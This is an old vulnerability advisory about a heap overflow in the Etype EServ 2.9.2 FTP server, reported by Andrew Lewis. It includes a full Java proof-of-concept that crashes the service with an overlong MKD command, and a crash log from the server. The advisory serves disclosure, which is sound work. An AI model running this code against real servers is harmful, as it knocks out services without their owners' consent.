Buffer Overflow Condition in EServ

 
Buffer Overflow Condition in EServ
Reported June 6 by
Andrew Lewis

VERSIONS EFFECTED
Etype Eserv 2.9.2

DESCRIPTION

The Eserv service can be made to crash by sending it long queries.  Because of an unchecked buffer condition, arbitrary code could be made to run on the server.

DEMONSTRATION CODE

--------------------------------------------------------
/* Proof of concept code for the heap overflow in EServ <= 2.9.2
* Written 10/05/2000 by Andrew Lewis aka. Wizdumb \[MDMA\]
*/

import java.io.*;
import java.net.*;

class eservheap \{

public static void main(String\[\] args) throws IOException \{

if (args.length < 1) \{
System.out.println("Syntax: java eservheap \[host\] <user> <pass>");
System.exit(1); \}

Socket soq = null;
PrintWriter white = null;
BufferedReader weed = null;

try \{
soq = new Socket(args\[0\], 21);
white = new PrintWriter(soq.getOutputStream(), true);
weed = new BufferedReader(new InputStreamReader(soq.getInputStream()));
\} catch (Exception e) \{
System.out.println("Problems connecting :-/");
System.exit(1); \}

weed.readLine();
String juzer = (args.length

3) ? ("USER " + args\[1\]) : "USER anonymous";
String pasz = (args.length

3) ? ("PASS " + args\[2\]) : "PASS mdma";
white.println(juzer + "\n" + pasz);
weed.readLine();
weed.readLine();

white.print("MKD ");
for (int i = 0; i < 10000; i++) white.print("A");
white.println(); // uNf! Who yoh daddy, bitch?
weed.readLine();
white.println("QUIT"); \} \}
--------------------------------------------------------

And no, you don"t need write access to the directory for that to work -- like
I said, The heap overflow occurs in the logging. :)

The following extract from e.log show the effect of this code...

----------------------------------------
27.05.2000 17:02:19 Eserv/2.92 2986 1
EXCEPTION! CODE:C0000005 ADDRESS:49247E WORD:C! REGISTERS:
1C5EC6C 50 62 34 00 36 5D 4E 00 FF 5F 34 00 0C 27 00 00
Pb4.6\]N.Ñ_4.."..
1C5EC7C E8 FD 00 00 41 00 00 00 48 FF C5 01 7E 24 49 00
ÉÜ..A...HÑå.~$I.
1C5EC8C 1B 00 00 00 46 02 01 00 9C EE C5 01 23 00 00 00
.....F..._Ïå.#...

/* Ie. Thread crashes on MKD, but has no effect on other threads */

USER DATA: 346250 HANDLER: 1C5EED0 RETURN STACK:
1C5EE9C : 498BB9 C!
1C5EEA0 : 4C2AF0 HOLD
1C5EEA4 : 4CAC34 HOLDS
/* these HOLDS are buggy - no length checking */
1C5EEA8 : 7FFFE6FC <not in the image>
1C5EEAC : 7FFFD8F4 <not in the image>
1C5EEB0 : 4CAC49 HOLDS
1C5EEB4 : 4E5E12 MKD
1C5EEB8 : 49B279 |DROP
1C5EEBC : 2 <not found>
1C5EEC0 : 339DE8 <not found>
1C5EEC4 : 270C <not found>
1C5EEC8 : 4C42C1 INTERPRET
1C5EECC : 4C303F NEW_CATCH
1C5EED0 : 1C5EF14 <not in the image>
----------------------------------------

VENDOR RESPONSE

The vendor is aware of this problem however however no response was known at the time of this writing.

CREDITS
Discovered and reported by Andrew Lewis

Hide comments

Comments

  • Allowed HTML tags: <em> <strong> <blockquote> <br> <p>

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.
Publish